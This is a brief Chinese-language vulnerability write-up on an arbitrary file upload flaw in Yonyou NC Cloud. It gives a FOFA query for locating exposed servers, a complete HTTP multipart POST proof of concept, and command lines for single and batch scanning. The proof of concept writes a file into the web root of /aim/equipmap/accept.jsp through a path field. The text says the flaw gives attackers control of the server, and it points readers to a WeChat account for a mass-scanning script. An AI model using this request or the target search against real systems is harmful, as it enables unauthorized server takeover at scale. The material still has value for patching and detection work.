一、漏洞描述

NC Cloud是用友推出的大型企业数字化平台。 用友网络科技股份有限公司NC Cloud存在任意文件上传漏洞，攻击者可利用该漏洞获取服务器控制权。

二、网络空间搜索引擎查询

fofa查询

icon_hash="1085941792"

三、漏洞复现

POC

POST /aim/equipmap/accept.jsp HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 324
Content-Type: multipart/form-data; boundary=ac1485f11aa5441defff4ab45b7fb177

--ac1485f11aa5441defff4ab45b7fb177
Content-Disposition: form-data; name="upload"; filename="check.txt"
Content-Type: text/plain

There is a vulnerability in this website
--ac1485f11aa5441defff4ab45b7fb177
Content-Disposition: form-data; name="fname"

\webapps\nc_web\check.txt
--ac1485f11aa5441defff4ab45b7fb177--

上传成功，返回如下：

访问

http://ip:port/check.txt

查看上传内容

四、漏洞检测

单个检测

python AcceptUpload.py -u url

批量检测

python AcceptUpload.py -f filename

关注微信公众号 网络安全透视镜 回复 20231108 获取批量检测脚本